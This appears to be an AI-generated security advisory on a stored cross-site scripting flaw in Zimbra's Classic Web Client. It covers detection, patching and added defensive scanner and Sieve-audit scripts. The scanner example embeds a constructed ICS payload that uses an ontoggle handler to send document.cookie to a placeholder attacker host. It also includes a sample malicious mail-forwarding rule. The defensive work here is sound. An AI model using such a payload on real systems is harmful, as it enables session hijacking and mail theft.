CVE-2025-27915 Overview
A stored cross-site scripting (XSS) vulnerability has been discovered in Zimbra Collaboration Suite (ZCS) versions 9.0, 10.0, and 10.1. The vulnerability exists in the Classic Web Client because HTML content carried in ICS (iCalendar) files is not sufficiently sanitized before it is rendered. When a user views an email message containing a malicious ICS entry, embedded JavaScript executes through an ontoggle event handler attribute on a <details> HTML element.
This vulnerability is particularly dangerous because it allows attackers to execute arbitrary JavaScript within the context of a victim's authenticated session, enabling unauthorized actions such as creating email filter rules to redirect messages to attacker-controlled addresses.
Critical Impact
This vulnerability is actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. Attackers can perform unauthorized actions on victim accounts, including email redirection and data exfiltration.
Affected Products
- Zimbra Collaboration Suite 9.0.0 (all patch levels through P43)
- Zimbra Collaboration Suite 10.0 (versions prior to 10.0.13)
- Zimbra Collaboration Suite 10.1 (versions prior to 10.1.5)
Discovery Timeline
- 2025-03-12 - CVE-2025-27915 published to NVD
- 2025-11-04 - Last updated in NVD database
Technical Details for CVE-2025-27915
Vulnerability Analysis
This stored XSS vulnerability exploits a weakness in how Zimbra's Classic Web Client processes and renders ICS (iCalendar) calendar file attachments within email messages. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation).
When a user receives and views an email containing a crafted ICS file, the Classic Web Client fails to properly sanitize the HTML content embedded within the calendar entry. The attacker uses the <details> HTML5 element with an ontoggle event handler attribute; the browser fires the toggle event whenever the element's open state changes, and the handler's JavaScript runs at that point.
The attack requires user interaction (viewing the malicious email) and targets authenticated users of the Zimbra Classic Web Client. Once executed, the attacker's JavaScript runs within the victim's session context, granting access to perform actions as the authenticated user.
Root Cause
The root cause is insufficient input sanitization in the ICS parsing and rendering path of Zimbra's Classic Web Client. The application fails to strip or escape HTML event handler attributes (ontoggle here, but the same applies to any on* attribute) before rendering ICS text content in the browser, so interactive elements such as <details> can carry attacker-controlled script. Because the content is stored on the server as part of the message, the script executes for every user who views the malicious item.
Attack Vector
The attack is delivered via email containing a specially crafted ICS calendar file attachment. The attacker embeds malicious HTML within the ICS file structure, specifically using a <details> tag with an ontoggle event handler. When the victim opens or previews the email in Zimbra's Classic Web Client, the browser renders the ICS content without proper sanitization.
The JavaScript payload executes in the context of the victim's authenticated session, allowing the attacker to:
- Create email filter rules to redirect incoming messages to attacker-controlled addresses
- Access and exfiltrate sensitive email content
- Modify account settings
- Send emails on behalf of the victim
- Potentially chain with other vulnerabilities for further compromise
The attack mechanism relies on the <details> element's toggle event: the browser fires ontoggle whenever the element's open attribute is added or removed, and a <details> element delivered with the open attribute already present toggles as soon as it is parsed. The payload therefore runs when the message is rendered, without requiring any click beyond viewing the email.
Detection Methods for CVE-2025-27915
Indicators of Compromise
- Suspicious email filter rules created without user knowledge, particularly rules forwarding emails to external addresses
- ICS file attachments containing unusual HTML elements such as <details>, <summary>, or event handlers like ontoggle, onclick, or onerror
- Unexpected outbound email traffic to unfamiliar external domains
- User reports of missing emails that match newly created filter criteria
Detection Strategies
- Implement email gateway rules to scan ICS attachments for embedded HTML tags and JavaScript event handlers
- Monitor Zimbra audit logs for bulk filter rule creations or modifications, especially those targeting email forwarding
- Web application firewall (WAF) rules in front of the Zimbra web tier have limited value here: the payload arrives over SMTP as an attachment, so HTTP inspection only sees it when calendar data is submitted through the web interface. Treat WAF rules for XSS patterns in calendar-related requests as a secondary control, not the primary detection.
- Review mail filter configurations across user accounts for unauthorized forwarding rules
Monitoring Recommendations
- Enable detailed logging for email filter rule changes in Zimbra administrative console
- Set up alerts for filter rules that forward emails to external domains
- Monitor for unusual patterns in ICS file attachments being received organization-wide
- Implement user behavior analytics to detect anomalous account activities following email viewing
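The two steps above that a gateway or mail-security control has to get right are (a) reading the ICS attachment correctly, including RFC 5545 line folding, which can split a payload across physical lines, and (b) looking for event handler attributes rather than only <script> tags. The following is an added example, not Zimbra code and not from the StrikeReady research; it uses a constructed ICS with an attacker.invalid placeholder host and shows the Attack Vector payload, a <script>-only filter failing to catch it, a gateway-style scan, and the hardened stripping step a renderer needs.

```javascript
// Added example, not Zimbra code: unfold an iCalendar (RFC 5545) attachment, pull out
// the free-text properties a mail client renders as HTML, and both flag and strip the
// inline-script vectors (on* handlers, javascript: URLs) that a <script>-only filter misses.
// All sample data below is constructed; attacker.invalid is a placeholder host.

// Constructed ICS modelled on the page's description. The DESCRIPTION is folded across
// two physical lines (RFC 5545 line folding) and carries a <details open ontoggle=...>
// payload; with the open attribute present, the toggle event fires as soon as the
// element is parsed, so viewing the invite is enough.
const SAMPLE_ICS = [
  "BEGIN:VCALENDAR",
  "VERSION:2.0",
  "PRODID:-//constructed-sample//EN",
  "BEGIN:VEVENT",
  "UID:sample-1@example.invalid",
  "DTSTART:20250312T090000Z",
  "SUMMARY:Quarterly review",
  "DESCRIPTION:Agenda attached.<details open ontoggle=\"fetch('https://attacker.",
  " invalid/?c='+document.cookie)\"><summary>details</summary></details>",
  "END:VEVENT",
  "END:VCALENDAR",
].join("\r\n");

// RFC 5545 section 3.1: CRLF followed by a single space or tab is a fold; drop it.
function unfoldIcs(text) {
  return text.replace(/\r?\n[ \t]/g, "");
}

// Properties that mail clients typically render as rich text.
const RENDERED_PROPS = ["SUMMARY", "DESCRIPTION", "LOCATION", "COMMENT", "X-ALT-DESC"];

// Returns { NAME: value } for rendered properties, ignoring parameters such as
// DESCRIPTION;ALTREP="cid:...":value (quoted parameter values may contain colons).
function icsTextProperties(text) {
  const props = {};
  const contentLine = /^([A-Z0-9-]+)((?:;[^;:"]*(?:"[^"]*"[^;:"]*)*)*):(.*)$/;
  for (const line of unfoldIcs(text).split(/\r?\n/)) {
    const m = contentLine.exec(line);
    if (m && RENDERED_PROPS.includes(m[1])) props[m[1]] = m[3];
  }
  return props;
}

// Detection: report every on* attribute inside a tag, plus javascript: URLs.
function findInlineScript(html) {
  const findings = [];
  for (const m of html.matchAll(/<[^>]*?\s(on[a-z]+)\s*=/gi)) findings.push(m[1].toLowerCase());
  if (/\b(?:href|src|action)\s*=\s*["']?\s*javascript:/i.test(html)) findings.push("javascript:");
  return findings;
}

// Gateway-style check over a whole ICS: which rendered properties carry inline script.
function scanIcs(text) {
  const report = {};
  for (const [name, value] of Object.entries(icsTextProperties(text))) {
    const hits = findInlineScript(value);
    if (hits.length) report[name] = hits;
  }
  return report;
}

// The inadequate filter: removing <script> elements leaves event handlers untouched.
function naiveStripScriptTags(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}

// Hardened rendering step: drop every on* attribute (quoted or bare) and neutralise
// javascript: URLs. Removing <details> alone would not help; the same handler works on
// <img onerror>, <svg onload>, <body onload> and so on. A production sanitizer should
// use a real HTML parser with an element/attribute allow-list rather than regexes.
function stripInlineScript(html) {
  return html
    .replace(/\s(on[a-z]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, "")
    .replace(/\b(href|src|action)\s*=\s*(["']?)\s*javascript:[^"'\s>]*\2/gi, "$1=$2#$2");
}

const desc = icsTextProperties(SAMPLE_ICS).DESCRIPTION;
console.log("scan:", JSON.stringify(scanIcs(SAMPLE_ICS)));
console.log("after <script>-only filter:", findInlineScript(naiveStripScriptTags(desc)));
console.log("after stripInlineScript:", stripInlineScript(desc));
```

The unfolding step matters for detection: a gateway rule that greps raw attachment lines for `ontoggle=` can be evaded by folding the attribute name across a line break, which the client silently rejoins before rendering. The regex sanitizer is shown to make the attribute-level point concrete; for production use, parse the fragment and allow-list elements and attributes instead.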
How to Mitigate CVE-2025-27915
Immediate Actions Required
- Upgrade Zimbra Collaboration Suite to patched versions: 9.0.0 P44, 10.0.13, or 10.1.5
- Audit all user email filter rules for unauthorized forwarding configurations
- Consider temporarily disabling the Classic Web Client and directing users to the Modern Web Client if immediate patching is not possible
- Review recent ICS file attachments received by the organization for malicious content
Patch Information
Zimbra has released security patches addressing this vulnerability across all affected version branches:
- Zimbra 9.0.0 Patch 44 - See the Zimbra 9.0.0 P44 Security Fixes for details
- Zimbra 10.0.13 - See the Zimbra 10.0.13 Security Fixes for details
- Zimbra 10.1.5 - See the Zimbra 10.1.5 Security Fixes for details
Organizations should prioritize patching immediately given this vulnerability's presence in the CISA Known Exploited Vulnerabilities Catalog. Additional technical analysis is available from StrikeReady's research on this ICS attack vector.
Workarounds
- Block or quarantine emails containing ICS file attachments at the email gateway until patching is complete; note that this also blocks legitimate meeting invitations, so scope it by sender or pair it with content inspection rather than applying it blindly
- Disable the Classic Web Client and enforce use of the Modern Web Client, which this advisory does not list as affected; this reduces exposure but is not a substitute for patching
- Implement Content Security Policy (CSP) headers to restrict inline script execution where possible; validate in a test environment first, because the Classic Web Client itself relies on inline script and a strict policy can break it
- Deploy email security solutions that can inspect and sanitize calendar file attachments
# Example: Check Zimbra version and patch level (run as the zimbra user)
su - zimbra
zmcontrol -v
# Example: Review existing mail filter rules for all users (run as zimbra user)
zmprov -l gaa | while read -r account; do
  echo "=== Filters for: $account ==="
  zmprov ga "$account" zimbraMailSieveScript 2>/dev/null
done
# Example: Flag accounts whose filters redirect mail (the Sieve "redirect" action) or
# that have an account-level forwarding address set outside of Sieve
zmprov -l gaa | while read -r account; do
  hits=$(zmprov ga "$account" zimbraMailSieveScript zimbraPrefMailForwardingAddress 2>/dev/null \
           | grep -iE 'redirect|^zimbraPrefMailForwardingAddress:')
  if [ -n "$hits" ]; then
    echo "=== REVIEW: $account ==="
    echo "$hits"
  fi
done
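Listing every account that has any redirect rule produces a lot of noise in organisations that legitimately route mail to shared mailboxes. What the Monitoring Recommendations and the Immediate Actions actually call for is distinguishing redirects to the organisation's own domain from redirects to external addresses. The following is an added example, not Zimbra tooling: it parses the Sieve text that zmprov returns for zimbraMailSieveScript, extracts every redirect target, and prints only those outside a given domain. The Sieve script, corp.example and evil.example are constructed placeholders, and the zmprov loop at the end is an assumed integration rather than something the page shows.

```shell
#!/bin/sh
# Added example (not Zimbra tooling): parse the Sieve text stored in zimbraMailSieveScript,
# list every redirect target, and flag the ones outside the organisation's own domain.
# SAMPLE_SIEVE is a constructed sample, not a real account's filter.

SAMPLE_SIEVE='require ["fileinto", "copy"];
# benign rule: copy helpdesk mail to an internal shared mailbox
if header :contains ["subject"] "ticket" {
  redirect :copy "Helpdesk@corp.example";
}
# attacker-style rule: silently copy every message to an external mailbox
if true {
  redirect :copy "collector@evil.example";
  stop;
}'

# list_redirect_targets SCRIPT
# Prints every redirect target (with or without :copy), one per line, lowercased.
list_redirect_targets() {
  printf '%s\n' "$1" \
    | grep -oiE 'redirect([[:space:]]+:copy)?[[:space:]]+"[^"]+"' \
    | sed -E 's/.*"([^"]+)"$/\1/' \
    | tr 'A-Z' 'a-z'
}

# flag_external_redirects SCRIPT DOMAIN
# Prints only the targets whose domain differs from DOMAIN (case-insensitive).
flag_external_redirects() {
  dom=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
  list_redirect_targets "$1" | awk -F'@' -v dom="$dom" 'NF == 2 && $2 != dom'
}

# Stand-alone demo on the constructed sample.
echo "all redirect targets:"
list_redirect_targets "$SAMPLE_SIEVE"
echo "external targets (alert on these):"
flag_external_redirects "$SAMPLE_SIEVE" "corp.example"

# Assumed integration against a live server, run as the zimbra user:
#   zmprov -l gaa | while read -r acct; do
#     script=$(zmprov ga "$acct" zimbraMailSieveScript 2>/dev/null)
#     ext=$(flag_external_redirects "$script" "corp.example")
#     [ -n "$ext" ] && printf 'ALERT %s -> %s\n' "$acct" "$ext"
#   done
```

Run the live loop from cron and diff its output against the previous run to get the "new external forwarding rule" alert the monitoring section asks for. Sieve rules are not the only forwarding path: the account-level zimbraPrefMailForwardingAddress attribute bypasses Sieve entirely, so pull it alongside the script in the same sweep.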
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


